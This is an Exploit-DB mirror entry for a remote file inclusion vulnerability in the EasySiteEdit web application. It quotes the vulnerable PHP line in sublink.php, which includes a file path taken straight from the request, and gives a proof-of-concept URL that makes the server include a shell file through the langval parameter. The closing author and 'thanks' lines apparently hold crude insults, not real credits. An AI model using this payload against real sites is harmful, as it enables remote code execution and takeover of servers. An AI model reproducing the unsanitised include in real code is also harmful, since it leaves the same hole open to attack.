exploit-db-mirror/exploits/php/webapps/17705.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

14 lines
No EOL
440 B
Text

# Exploit Title: EasySiteEdit remote file include
# Date:2011
# Author:koskesh jakesh
# Software Link: http://www.easysiteedit.com/licensesystem/esev2versions/esev2.zip
# Tested on: linux
-------------------------------
vul:sublink.php
line 20:
include($_REQUEST['langval']);
-------------------------------
poc:
site.com/path/sublink.php?langval=shell.txt?
--------------------------------
thanks:kire rostam,kose zan dait,kose shohar amat